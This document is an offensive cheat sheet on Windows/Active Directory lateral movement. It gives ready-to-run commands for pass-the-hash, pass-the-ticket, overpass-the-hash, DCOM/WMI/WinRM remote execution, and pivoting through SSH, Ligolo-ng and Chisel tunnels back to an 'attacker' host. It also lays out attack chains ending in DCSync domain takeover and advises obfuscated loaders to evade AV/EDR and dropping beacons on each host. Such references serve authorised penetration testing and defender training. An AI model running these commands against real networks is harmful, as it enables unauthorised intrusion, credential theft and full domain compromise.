Lateral Movement Reference
Techniques for moving between hosts given a credential material foothold. Chosen execution method affects stealth, logging artefacts, and whether a privileged shell is obtained.
Credential forms
| Form | Usable with |
|---|---|
| Cleartext password | Everything |
| NT hash | PtH (SMB, WinRM, LDAP via NTLM), Rubeus asktgt, overpass |
| AES256 key | Kerberos TGT via getTGT / Rubeus |
| TGT (.ccache / .kirbi) | PtT via KRB5CCNAME, Rubeus ptt |
| TGS | PtT for specific SPN |
| DPAPI master key | Decrypt stored browser/RDP credentials |
Pass-the-Hash (PtH)
# Impacket family (SMB)
psexec.py domain.local/admin@target -hashes :NTHASH
wmiexec.py domain.local/admin@target -hashes :NTHASH # quieter
smbexec.py domain.local/admin@target -hashes :NTHASH
atexec.py domain.local/admin@target -hashes :NTHASH "whoami"
# NetExec
nxc smb targets.txt -u admin -H :NTHASH --local-auth -x "whoami"
# WinRM
evil-winrm -i target -u admin -H NTHASH
# Mimikatz (spawn a process with injected NTLM)
mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:HASH /run:cmd.exe"Key note: PtH works against SMB/WinRM/MSRPC but not against Kerberos-only services. For Kerberos targets, upgrade to overpass-the-hash to obtain a TGT.
Pass-the-Ticket (PtT)
# Linux: set KRB5CCNAME and go
export KRB5CCNAME=$(pwd)/admin.ccache
psexec.py -k -no-pass domain.local/admin@target
smbclient -k //target/C$
# Windows: import kirbi with mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi" exit
Rubeus.exe ptt /ticket:ticket.kirbiOverpass-the-Hash (hash -> TGT)
# Rubeus (on target / owned host)
Rubeus.exe asktgt /user:admin /rc4:NTHASH /ptt
Rubeus.exe asktgt /user:admin /aes256:AESKEY /ptt
# Impacket (offline)
getTGT.py domain.local/admin -hashes :NTHASH -dc-ip 10.0.0.1
export KRB5CCNAME=$(pwd)/admin.ccacheDCOM execution
DCOM lateral movement avoids service creation (no 7045), and some variants avoid SMB entirely.
# Impacket dcomexec — objects: MMC20, ShellWindows, ShellBrowserWindow
dcomexec.py -object MMC20 domain.local/admin:pass@target
dcomexec.py -object ShellWindows domain.local/admin@target -hashes :NTHASH# Native PowerShell DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","target"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")Detection: unusual parent-child (mmc.exe -> cmd.exe), Windows Event 10000-range, Sysmon EID 1.
WMI execution
# Impacket (DCERPC over TCP/135 + high port)
wmiexec.py domain.local/admin:pass@target
# NetExec
nxc wmi target -u admin -p 'pass' -x 'whoami'# Native: Invoke-WmiMethod / Win32_Process.Create
Invoke-WmiMethod -ComputerName target -Class Win32_Process -Name Create \
-ArgumentList "powershell -enc <b64>" -Credential $credWinRM / PowerShell Remoting
evil-winrm -i target -u user -p 'pass'
evil-winrm -i target -u user -H NTHASH
nxc winrm target -u user -p 'pass' -X '$PSVersionTable'Enter-PSSession -ComputerName target -Credential (Get-Credential)
Invoke-Command -ComputerName target -ScriptBlock { whoami } -Credential $cWinRM listens on 5985/5986. GPO-controlled; presence of TrustedHosts config is a strong pivot signal.
SSH pivoting
# Local port forward — expose remote 3306 on our 33306
ssh -L 33306:internal-db:3306 user@jump.target
# Dynamic SOCKS proxy (use with proxychains for tool chaining)
ssh -D 1080 user@jump.target
# /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nxc smb 10.10.10.0/24 -u alice -p 'Summer2026!'
# Remote port forward — pull internal port to attacker box
ssh -R 4444:localhost:4444 user@attacker.box
# ProxyJump chain (multi-hop)
ssh -J user1@jump1,user2@jump2 user3@final-targetSMB/named-pipe pivoting (Windows)
# Ligolo-ng (preferred modern pivot)
# On attacker: ./proxy -selfcert
# On compromised host: ./agent -connect attacker:11601
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.10.10.0/24 dev ligolo
# Now attacker tools route transparently through compromised host
# Chisel (reverse SOCKS over HTTP)
# server: chisel server -p 8000 --reverse
# client: chisel client attacker:8000 R:socksChain patterns (observed)
- LLMNR -> Kerberoast -> DA: capture NTLMv2, crack, query SPNs as low-priv user, crack svc hash, reuse on local admin, DCSync.
- PtH cluster sweep: local admin hash on WS image -> nxc sweep -> find DA session -> mimikatz -> DCSync.
- RBCD from MAQ: low-priv user -> addcomputer -> write
msDS-AllowedToActOnBehalfOfOtherIdentityon target server -> getST impersonate DA -> PSExec. - ADCS ESC8 via coercion: PetitPotam DC$ -> ntlmrelayx to http CA -> DC cert -> DCSync.
Safety & stealth
- Prefer WMI/DCOM over psexec when engagement calls for evasion — no service creation event.
- Rubeus/mimikatz on the wire trigger AV/EDR — use obfuscated loaders or run via legitimate signed tools (e.g.,
GetTGT.pyfrom Linux hop). - Each pivot is an opportunity to drop a beacon — keep an inventory per host for cleanup.
- Clean up imported tickets:
klist purge(Windows) /kdestroy -A(Linux).
Tool versions validated
- impacket >= 0.12
- NetExec >= 1.3
- Rubeus >= 2.3
- evil-winrm >= 3.7
- ligolo-ng >= 0.7
- chisel >= 1.9